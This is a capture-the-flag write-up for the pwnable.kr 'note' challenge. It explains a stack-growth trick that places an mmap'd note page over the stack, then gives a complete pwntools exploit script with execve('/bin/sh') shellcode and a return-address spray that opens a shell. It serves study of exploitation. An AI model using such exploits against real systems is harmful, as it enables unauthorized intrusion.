## note

Due to recursive function `select_menu`, one is able to grow stack up to maximum stack size, see: `ulimit -s`.  
To make exploitation happen, the `mmap_s` must draw address which is one page below top of the stack (at least).  
  
With this constraint, you are able to mount successful attack against return address. Here is a local exploit.
  
  
## local exploit

This is for a study purpose. You shall disable ASLR first.


```python
from pwn import *
import sys

path = '/home/deadbeef/projects/ripcontroller/pwns/pwnable.kr/note/note'

context.arch = 'i386'
p = process(path)
p.clean()


def write_note(slot, what):
    p.sendline('2')
    p.sendline(str(slot))
    p.sendline(what)
    p.clean()


def create_note():
    p.clean()
    p.sendline('1')
    ret = p.recv()
    slot = int(ret.split()[3])
    page_addr = int(ret.split('[')[1].split(']')[0], 16)
    return slot, page_addr


def delete_note(slut):
    p.clean()
    p.sendline('4')
    p.sendline(str(slut))
    return p.recv()


def get_vmmap():
    with open('/proc/' + str(p.pid) + '/maps', 'r') as f:
        vmas = f.readlines()
    return vmas


def get_stack_vma():
    vmas = get_vmmap()
    for vma in vmas:
        if '[stack]' in vma:
            stack_top = vma.split('-')[0]
            stack_bottom = vma.split('-')[1].split()[0]

    return int(stack_top, 16), int(stack_bottom, 16)


def fix_stack(stack):
    stack['frame_top'] = stack['frame_top'] - stack['frame_size']

    if stack['frame_top'] <= stack['top'] + 0x24a0:
        stack['top'] = stack['top'] - 0x1000

    stack['aligned_page'] = stack['top'] - 0x1000


stack = {
    'top': get_stack_vma()[0],
    'frame_top': 0xffffcdd0,
    'frame_size': 1072,
    'guard_gap': 0x00100000
}

vma = {
    'heap_end': 0x806e000,
    'libc_start': 0xf7dd6000,
    'shellcode': 0x0
}

offset = 0
def display_progress():
    global offset
    if offset > 70:
        sys.stdout.write('\n')
        offset = 0
    sys.stdout.write('.')
    offset = offset + 1


shellcode = "\x90\x90\x90\x90\x90\x90\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

time.sleep(12)

try:
    while True:
        display_progress()

        slot, addr = create_note()
        fix_stack(stack)

        if vma['heap_end'] < addr < vma['libc_start'] and vma['shellcode'] == 0:
            print '\n[+] allocated vma with shellcode at: {0}'.format(hex(addr))
            vma['shellcode'] = addr
            write_note(slot, shellcode)
            continue

        if addr > stack['top'] - 0x1000:
            print '\n [+] hit page within grown stack'
            print '[-] spraying page {page} with {addr}'.format(page=hex(addr), addr=(hex(vma['shellcode'] + 4)))
            write_note(slot, p32(vma['shellcode'] + 4) * 1024)
            fix_stack(stack)

            print "".join(get_vmmap())

            p.clean()
            p.sendline('5')
            break

        delete_note(slot)
        fix_stack(stack)

except:
    print "\n[x] It's lottery sometimes - try again!"
    exit(0)

p.interactive()
```
